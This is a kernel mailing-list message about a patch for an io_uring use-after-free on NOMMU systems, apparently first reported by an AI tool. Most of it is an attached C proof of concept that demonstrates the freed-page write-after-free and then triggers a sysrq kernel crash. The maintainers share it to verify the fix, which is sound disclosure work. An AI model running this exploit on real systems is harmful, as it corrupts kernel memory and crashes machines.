From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
To: Jens Axboe <axboe@kernel.dk>
Cc: io-uring@vger.kernel.org
Subject: Re: [PATCH] io_uring: take page references for NOMMU pbuf_ring mmaps
Date: Tue, 21 Apr 2026 18:01:36 +0200
Message-ID: <2026042140-arrogance-freehand-d8bd@gregkh>
In-Reply-To: <2026042108-fiscally-unglazed-56c7@gregkh>
[-- Attachment #1: Type: text/plain, Size: 2025 bytes --]
On Tue, Apr 21, 2026 at 03:55:38PM +0200, Greg Kroah-Hartman wrote:
> On Tue, Apr 21, 2026 at 07:50:32AM -0600, Jens Axboe wrote:
> > On 4/21/26 7:46 AM, Greg Kroah-Hartman wrote:
> > > Note, I have no way of testing this, I'm only forwarding this on because
> > > I got the bug report and was able to generate something that "seems"
> >
> > AI bug report I presume? Because I can't imagine anyone ever attempted
> > to run this.
>
> Yes, I got a bunch of "non-mmu" bug reports, which is a bit odd but I
> guess you can do that with qemu these days? I should dig into that,
> maybe that way I can test this and get a reproducer for you. If not,
> let's just bin the thing.
>
> > > correct, but it might be a total load of crap here, my knowledge of the
> > > vm layer is very low so take this for where it is coming from (i.e. a
> > > non-deterministic pattern matching system.)
> > >
> > > I do have another patch that just disables io_uring for !MMU systems, if
> > > you want that instead? Or is this feature something that !MMU devices
> > > actually care about?
> >
> > I mean, who really cares about !MMU in the first place, we should just
> > kill that off with a passion.
> >
> > Let me take a closer look at this and bounce it past some vm people, my
> > nommu knowledge is close to zero as it's never been relevant in my
> > professional life time. Which is saying something...
>
> Let me try to get a reproducer going first, let's not waste any more
> human time on this just yet, sorry for sending this out without that
> done first...
Ok, attached is a poc.c and a script to run it. If you run this on a
7.0 kernel today, it "should" crash, and then if you apply the patch it
doesn't (or at least that's what happened in my testing).
Note, I have run this locally and it seems to work, but be careful, I
can't guarantee anything. It does seem quite odd in that it "crashes"
the kernel with a sysrq call to show "proof". Although that is a cool
trick, I need to remember that...
thanks,
greg k-h
[-- Attachment #2: poc.c --]
[-- Type: text/plain, Size: 6740 bytes --]
// SPDX-License-Identifier: GPL-2.0
/*
* PoC for ANT-2026-02884: io_uring NOMMU pbuf_ring page use-after-free.
* Secondary: ANT-2026-02650 (duplicate vm_start) shares the same root
* cause but hits a mm/nommu.c BUG_ON that the fix does not address;
* this PoC targets 02884.
*
* Fixed by commit b4190296e84b ("io_uring: take page references for
* NOMMU pbuf_ring mmaps").
*
* Mechanism
* ---------
* Under !CONFIG_MMU, io_uring_get_unmapped_area() returns the kernel
* virtual address of the io_mapped_region's backing pages directly and
* io_uring_mmap() takes no page references. IORING_UNREGISTER_PBUF_RING
* -> io_put_bl()
* -> io_free_region()
* -> release_pages()
* therefore drops the only reference and the page returns to the buddy
* allocator while the user's VMA still has vm_start pointing into it.
* The user can read/write whatever the allocator hands out next.
*
* Detection: write a canary to the mmap'd page, unregister, re-read.
* Boot with init_on_free=1 so freed pages are zeroed; on a vulnerable
* kernel the canary becomes 0x00. On a fixed kernel io_uring_mmap()
* holds a get_page reference, release_pages() leaves refcount >= 1,
* the page is not freed, and the canary survives.
*
* On detection, demonstrate the write-after-free (re-allocate the page
* inside the kernel and observe it via the dangling pointer), then
* sysrq-crash so the qemu console shows an unambiguous kernel panic.
*
* Build (riscv64 nommu, nolibc, BINFMT_ELF_FDPIC loadable):
* make -C linux ARCH=riscv O=$PWD/build-nommu headers
* clang --target=riscv64-unknown-linux-gnu -march=rv64imac -mabi=lp64 \
* -mno-relax -static-pie -nostdlib -fno-stack-protector \
* -fno-builtin -isystem build-nommu/usr/include \
* -Ilinux/tools/include/nolibc -O2 -o poc poc.c \
* -fuse-ld=lld -Wl,--no-dynamic-linker -Wl,-N
*
* -isystem MUST come before nolibc so <asm/unistd.h> resolves to riscv,
* not the host's; -Wl,-N forces a single PT_LOAD so the FDPIC loader
* (which does not apply R_RISCV_RELATIVE) doesn't split text/data.
*
* Run as init under qemu-system-riscv64 -M virt -bios none.
* Required: CONFIG_MMU=n, CONFIG_IO_URING=y, CONFIG_MAGIC_SYSRQ=y,
* boot with init_on_free=1.
*/
/*
* binfmt_elf_fdpic's initial stack layout is not the SysV layout that
* nolibc's crt.h _start_c() expects; the auxv walk runs off into
* garbage. We don't need argc/argv/envp, so suppress crt.h and supply
* a minimal _start_c that just calls main. arch-riscv.h still provides
* the asm _start that calls _start_c.
*/
#define _NOLIBC_CRT_H
char **environ;
const unsigned long *_auxv;
#include "nolibc.h"
int main(void);
void _start_c(long *sp)
{
(void)sp;
exit(main());
}
#define __NR_io_uring_setup 425
#define __NR_io_uring_register 427
#define IORING_REGISTER_PBUF_RING 22
#define IORING_UNREGISTER_PBUF_RING 23
#define IORING_OFF_PBUF_RING 0x80000000ULL
#define IORING_OFF_PBUF_SHIFT 16
#define IOU_PBUF_RING_MMAP 1
#define PAGE_SIZE 4096
#define CANARY 0x55
struct io_sqring_offsets {
uint32_t head, tail, ring_mask, ring_entries, flags, dropped, array;
uint32_t resv1;
uint64_t user_addr;
};
struct io_cqring_offsets {
uint32_t head, tail, ring_mask, ring_entries, overflow, cqes, flags;
uint32_t resv1;
uint64_t user_addr;
};
struct io_uring_params {
uint32_t sq_entries, cq_entries, flags, sq_thread_cpu, sq_thread_idle;
uint32_t features, wq_fd, resv[3];
struct io_sqring_offsets sq_off;
struct io_cqring_offsets cq_off;
};
struct io_uring_buf_reg {
uint64_t ring_addr;
uint32_t ring_entries;
uint16_t bgid;
uint16_t flags;
uint64_t resv[3];
};
static int io_uring_setup(unsigned entries, struct io_uring_params *p)
{
return my_syscall2(__NR_io_uring_setup, entries, p);
}
static int io_uring_register(int fd, unsigned op, void *arg, unsigned nr)
{
return my_syscall4(__NR_io_uring_register, fd, op, arg, nr);
}
static void die(const char *what, long ret)
{
printf("[-] %s: %ld\n", what, ret);
if (getpid() == 1) {
reboot(LINUX_REBOOT_CMD_POWER_OFF);
}
exit(1);
}
static void crash_kernel(void)
{
int fd = open("/proc/sysrq-trigger", O_WRONLY);
if (fd >= 0)
write(fd, "c", 1);
/* sysrq disabled or /proc missing — clean exit so qemu log is
* still parseable. */
reboot(LINUX_REBOOT_CMD_POWER_OFF);
}
int main(void)
{
struct io_uring_params p;
struct io_uring_buf_reg reg;
volatile unsigned char *ring;
int fd, ret, i, dirty;
if (getpid() == 1) {
mkdir("/proc", 0555);
mount("proc", "/proc", "proc", 0, NULL);
}
memset(&p, 0, sizeof(p));
fd = io_uring_setup(8, &p);
if (fd < 0)
die("io_uring_setup", fd);
memset(&reg, 0, sizeof(reg));
reg.ring_entries = 8;
reg.bgid = 0;
reg.flags = IOU_PBUF_RING_MMAP;
ret = io_uring_register(fd, IORING_REGISTER_PBUF_RING, &reg, 1);
if (ret < 0)
die("REGISTER_PBUF_RING", ret);
ring = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, fd,
IORING_OFF_PBUF_RING | (0ULL << IORING_OFF_PBUF_SHIFT));
if (ring == MAP_FAILED)
die("mmap PBUF_RING", (long)ring);
printf("[*] pbuf_ring page mmap()ed at %p\n", ring);
for (i = 0; i < PAGE_SIZE; i++)
ring[i] = CANARY;
memset(&reg, 0, sizeof(reg));
reg.bgid = 0;
ret = io_uring_register(fd, IORING_UNREGISTER_PBUF_RING, &reg, 1);
if (ret < 0)
die("UNREGISTER_PBUF_RING", ret);
printf("[*] unregistered; canary[0..3] = %02x %02x %02x %02x\n",
ring[0], ring[1], ring[2], ring[3]);
dirty = 0;
for (i = 0; i < PAGE_SIZE; i++)
if (ring[i] != CANARY)
dirty++;
if (!dirty) {
printf("[+] OK: canary intact — mmap holds page reference, "
"fix is applied\n");
munmap((void *)ring, PAGE_SIZE);
close(fd);
if (getpid() == 1)
reboot(LINUX_REBOOT_CMD_POWER_OFF);
return 0;
}
printf("[!] VULNERABLE: %d/%d canary bytes clobbered after unregister "
"(ring[0]=%02x, expected %02x) — page was freed under live mmap\n",
dirty, PAGE_SIZE, ring[0], CANARY);
/*
* Demonstrate write-after-free: scribble through the dangling
* mapping, then make the kernel allocate a fresh page. The pcp
* freelist is LIFO, so the just-freed page is handed straight
* back; we can observe the kernel's writes through our pointer.
*/
for (i = 0; i < PAGE_SIZE; i++)
ring[i] = 0x41;
memset(&reg, 0, sizeof(reg));
reg.ring_entries = 8;
reg.bgid = 1;
reg.flags = IOU_PBUF_RING_MMAP;
ret = io_uring_register(fd, IORING_REGISTER_PBUF_RING, &reg, 1);
printf("[!] sprayed 0x41, re-registered bgid=1 (ret=%d); "
"ring[0..3] now %02x %02x %02x %02x — kernel reused the page\n",
ret, ring[0], ring[1], ring[2], ring[3]);
printf("[!] triggering sysrq crash\n");
if (getpid() == 1)
crash_kernel();
return 1;
}
[-- Attachment #3: run-poc.sh --]
[-- Type: application/x-sh, Size: 2871 bytes --]
Thread overview: 13+ messages
2026-04-21 13:46 [PATCH] io_uring: take page references for NOMMU pbuf_ring mmaps Greg Kroah-Hartman
2026-04-21 13:50 ` Jens Axboe
2026-04-21 13:55 ` Greg Kroah-Hartman
2026-04-21 14:02 ` Jens Axboe
2026-04-21 16:01 ` Greg Kroah-Hartman [this message]
2026-04-21 16:05 ` Jens Axboe
2026-04-21 16:21 ` Jens Axboe
2026-04-21 16:24 ` Greg Kroah-Hartman
2026-04-21 16:41 ` Jens Axboe
2026-04-21 17:04 ` Jens Axboe
2026-04-21 17:38 ` Jens Axboe
2026-04-21 17:39 ` Jens Axboe
2026-04-22 1:17 ` Jens Axboe